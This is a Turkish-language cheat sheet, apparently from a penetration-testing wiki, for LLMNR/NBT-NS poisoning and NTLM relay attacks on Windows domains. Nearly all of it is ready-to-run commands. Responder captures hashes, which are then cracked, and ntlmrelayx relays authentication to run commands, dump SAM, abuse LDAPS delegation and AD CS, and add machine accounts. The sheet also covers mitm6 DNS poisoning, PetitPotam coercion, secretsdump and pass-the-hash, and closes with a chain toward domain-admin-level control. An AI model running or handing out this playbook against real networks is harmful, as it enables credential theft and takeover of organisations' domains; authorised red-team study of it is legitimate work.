LLMNR/NBT-NS Poisoning & NTLM Relay
ATT&CK T1557.001 difficulty: orta
Windows istemcileri DNS başarısız olunca LLMNR ve NBT-NS (ve bazen mDNS) ile isim çözümlemeye çalışır. Saldırgan bu yayınlara sahte cevap vererek kurbanın NTLM kimlik doğrulamasını kendine yönlendirir; sonuç NetNTLMv2 hash yakalama veya relay ile kimliğe bürünmedir (T1557.001).
Ön koşullar
Section titled “Ön koşullar”- Aynı L2/broadcast segment (veya zehirleme trafiğine erişim)- Responder + impacket-ntlmrelayx- Relay için: SMB signing kapalı hedef (veya LDAPS / HTTP / MSSQL vb.)- Hash kırma için: GPU/wordlist (opsiyonel; relay tercihtir)Hash yakalama (Responder)
Section titled “Hash yakalama (Responder)”sudo responder -I eth0 -wvsudo responder -I eth0 -wFdls /usr/share/responder/logs/Kurban \yanlisad\share, hatalı UNC veya WPAD isteği yapınca hash düşer. Zorlamak için:
Offline kırma:
hashcat -m 5600 'user::domain:challenge:response...' rockyou.txt -r rules/best64.rulejohn --format=netntlmv2 hashes.txt --wordlist=rockyou.txtNTLM Relay (ntlmrelayx)
Section titled “NTLM Relay (ntlmrelayx)”Kırmak yerine kimlik doğrulamasını imzalama kapalı (veya LDAP/HTTP) hedefe aktar:
-
Relay hedefi bul — SMB signing kapalı hostları listele:
Terminal window nxc smb 10.10.10.0/24 --gen-relay-list targets.txt -
Responder’ı ayarla — SMB ve HTTP sunucularını kapat ki çakışmasın:
Terminal window # SMB = Off# HTTP = Offsudo responder -I eth0 -wv -
Relay’i başlat — gelen NTLM’i hedefe aktar:
Terminal window sudo ntlmrelayx.py -tf targets.txt -smb2support -iTerminal window sudo ntlmrelayx.py -t smb://10.10.10.6 -smb2support -c "whoami"Terminal window sudo ntlmrelayx.py -tf targets.txt -smb2support --dump-samTerminal window sudo ntlmrelayx.py -tf targets.txt -smb2support -socks -
LDAP / AD CS / delegasyon — machine account veya yüksek yetkili auth gelirse:
Terminal window sudo ntlmrelayx.py -t ldaps://dc01.hedef.local --delegate-accessTerminal window sudo ntlmrelayx.py -t ldaps://dc01.hedef.local --escalate-user lowprivTerminal window sudo ntlmrelayx.py -t ldaps://dc01.hedef.local --add-computer ATTACKER$ -smb2supportTerminal window sudo ntlmrelayx.py -t http://ca.hedef.local/certsrv/certfnsh.asp \--adcs --template Machine
mitm6 ile birleştirme
Section titled “mitm6 ile birleştirme”IPv6 tercih eden Windows istemcilerinde DHCPv6 ile DNS zehirleme + relay:
sudo mitm6 -d hedef.localsudo ntlmrelayx.py -6 -t ldaps://dc01.hedef.local -wh attacker.hedef.local \ --delegate-accessDetay: MITM.
Coercion → relay
Section titled “Coercion → relay”python3 PetitPotam.py -d hedef.local -u user -p pass ATTACKER_IP DC_IPBaşarı sonrası
Section titled “Başarı sonrası”proxychains secretsdump.py hedef/admin@10.10.10.6nxc smb 10.10.10.0/24 -u admin -H <NTLM> --local-authKomut üreteci
Section titled “Komut üreteci”NTLM Relay · ntlmrelayx
embedded toolimpacket-ntlmrelayx -tf targets.txt -smb2supportNTLM Relay · ntlmrelayx
Section titled “NTLM Relay · ntlmrelayx”Saldırı zinciri
Section titled “Saldırı zinciri”nxc --gen-relay-list → Responder (SMB/HTTP Off) + ntlmrelayx -socks → kullanıcı UNC açar / coercion → local admin SAM → PtH fleet-widemitm6 + ntlmrelayx ldaps --delegate-access → machine account RBCD → S4U → Domain Admin benzeri etki